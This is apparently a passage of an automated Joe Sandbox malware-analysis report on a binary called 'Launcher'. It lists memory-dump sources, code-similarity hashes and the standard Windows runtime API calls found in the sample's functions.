                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                                            • Opcode ID: b7980bc917bf63d502cbe841f81a97ed445b84371fa90cbd3a300b236228da9f
                                                                                                                                                                                                                                                            • Instruction ID: d9871f52ee7c65c17420ba4cc46e9e61bfd8a2055bf9e838cdbcd83cf0fca469
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7980bc917bf63d502cbe841f81a97ed445b84371fa90cbd3a300b236228da9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07E04F71504158BBCF132F62DC04FAE3E2AEF847A1F004010FD1565120CB369D61EA95
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00014188), ref: 009D406C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                            • Opcode ID: 7b86c3d18c89802d2c6400ae23fcac344f0d98e9f233a8483bf9c90009a9a6a2
                                                                                                                                                                                                                                                            • Instruction ID: 4f3085462d4a4600872e0832a0674e3da1912d2fb047399d67f160abb5208f77
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b86c3d18c89802d2c6400ae23fcac344f0d98e9f233a8483bf9c90009a9a6a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 0-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 44ae54902fb32f9708e5520c36c03fee937b6c4d763e2a390d161be6fa269402
                                                                                                                                                                                                                                                            • Instruction ID: 776685e28a88684e52ffb6a10f16fab066b557b0795169972651a7b697908eec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44ae54902fb32f9708e5520c36c03fee937b6c4d763e2a390d161be6fa269402
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 835199B0D0020D9FCB40DFA8D591AEEBBF4BB4A350F24445AE815FB351D734AA41CB69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                                            • Opcode ID: 351684aec7dd5c27b60c520afd55448d1dbe96d0ee3926fd6361e857e2d43f62
                                                                                                                                                                                                                                                            • Instruction ID: c7427f727c515fcba3ed5c74e7630689b13ea962dd3e12c358f95b48fc60c859
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351684aec7dd5c27b60c520afd55448d1dbe96d0ee3926fd6361e857e2d43f62
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46A001B1629201CB97408F36AA5962D3AA9AA4A6917498069A429C9164EA289490FF02
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f2fc957a023a34a81f92743df9ded66c93b6ade819c22337f6cef84552d91796
                                                                                                                                                                                                                                                            • Instruction ID: b911263a0f12a32917ffef27943ccdad84e67086307c57b347bb7150d0cf9407
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2fc957a023a34a81f92743df9ded66c93b6ade819c22337f6cef84552d91796
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83D0923A655A58AFC210CF49E440D51F7B9FB8D670B158566EA0893B20C331FC11CAE0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(013AE090,013AE090,00000000,7FFFFFFF,?,009EEDDD,013AE090,013AE090,00000000,013AE090,?,?,?,?,013AE090,00000000), ref: 009EEE98
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009EEF53
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009EEFE2
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009EF02D
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009EF033
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009EF069
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009EF06F
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009EF07F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 127012223-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: bc9c0dd79099146911b4e1b8fe89c2fb0b7b1f55516f0d6b42d117a6591bf1d2
                                                                                                                                                                                                                                                            • Instruction ID: 09729484268a584c893f03f3236bbbe5f01b387554142d120ea74d2cb8277532
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc9c0dd79099146911b4e1b8fe89c2fb0b7b1f55516f0d6b42d117a6591bf1d2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 857108729002C9ABDF239F668C51BAF77BD9F89311F19046AF904B7283DB758C418761
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 009D45F0
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009D461C
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 009D465B
                                                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009D4678
                                                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009D46B7
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009D46D4
                                                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009D4716
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009D4739
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 2040435927-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 8d464792e98547be247173cdf4941b7bd194f244f99c73e999ca7f838e85eab1
                                                                                                                                                                                                                                                            • Instruction ID: af8f889eb5793efc9b9bc6ef2bf8ebe56c76f15973dd9bb774d666ef6fcfdb8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d464792e98547be247173cdf4941b7bd194f244f99c73e999ca7f838e85eab1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6519E72640206ABEF205F64CC45FBE7BA9EF55740F24842AF919EB290DB34DD10DB60
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009D5477
                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009D547F
                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009D5508
                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009D5533
                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009D5588
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: A2sx$csm
                                                                                                                                                                                                                                                            • API String ID: 1170836740-272854930
                                                                                                                                                                                                                                                            • Opcode ID: c10b075f06245f6b298f3c07932b7586ffe695f5f4b109ba7ee4e481867bea82
                                                                                                                                                                                                                                                            • Instruction ID: f3d6aea293e6d0c832193ad1af3707fc119c1174a74086b3185fbefbf551609c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c10b075f06245f6b298f3c07932b7586ffe695f5f4b109ba7ee4e481867bea82
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB410930A00608DBCF11DF68D884BAE7BB6AF85315F15C156F9189B3A2D771DE41CB91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                                            • Opcode ID: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                            • Instruction ID: dddc8d1969c849d4f1615c5e62e7425cdb25a2c447667a9354e6bd86fdca5c29
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93B14772A013D5AFDB138F26CC8ABAE7BA9EF55710F14C155E904AB382D674DE01C7A0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009E1C52
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009E1D1B
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009E1D82
                                                                                                                                                                                                                                                              • Part of subcall function 009E04C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,009D119F,?,?,009C31F2,00001000,?,009C313A), ref: 009E04F3
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009E1D95
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009E1DA2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1423051803-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: c1da9bc0ee1fbc7e2dbbb7a1cd287c5f8aa99e2aa674f688f58f3545f4047dde
                                                                                                                                                                                                                                                            • Instruction ID: e173818bff1035531149ea45001a7741a841ff30b1b91c87150616a96e71ac56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1da9bc0ee1fbc7e2dbbb7a1cd287c5f8aa99e2aa674f688f58f3545f4047dde
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C51B572600286BFEF229F66CC81EBB7BAEEF84710B154529FD04D6191EB75DC90C660
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009D38A2
                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,009D386B,?,00000000,?,009CB20C,?,?,009CD57E), ref: 009D38C1
                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,009D386B,?,00000000,?,009CB20C,?,?,009CD57E), ref: 009D38EF
                                                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,009D386B,?,00000000,?,009CB20C,?,?,009CD57E), ref: 009D394A
                                                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,009D386B,?,00000000,?,009CB20C,?,?,009CD57E), ref: 009D3961
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 66001078-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 12b605f43770d3dcc7a722be04188c703dc0ae493c2f9d91729b4a3b6983e37c
                                                                                                                                                                                                                                                            • Instruction ID: b3af9a1d5227deffee14d4afed01caf60764e56dccf97a7f53389d423074fa04
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b605f43770d3dcc7a722be04188c703dc0ae493c2f9d91729b4a3b6983e37c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F418C71584A06DFCB20DF66C4A0A6AB3F8FF48352B50CA1BE446D7740D7B0EA81CB52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,78733241,?,009E1508,009C31F2,?,00000000,?), ref: 009E14BA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                            • Opcode ID: d66fed3ce785da500465e81f77835260ee5b25fc9495d9c17cf0f45f09a2afe7
                                                                                                                                                                                                                                                            • Instruction ID: ec305e7d732e26c531d60c7e4e1425075a019d4c25a83eef05fd672c747d8a24
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d66fed3ce785da500465e81f77835260ee5b25fc9495d9c17cf0f45f09a2afe7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21E771A15295ABDB239B67EC44A6A379C9B817B4F250110F905A73E1F630EE00D6D0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,78733241,?,?,00000000,009F0244,000000FF,?,009DA5FD,009DA4E4,?,009DA699,00000000), ref: 009DA571
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009DA583
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,009F0244,000000FF,?,009DA5FD,009DA4E4,?,009DA699,00000000), ref: 009DA5A5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
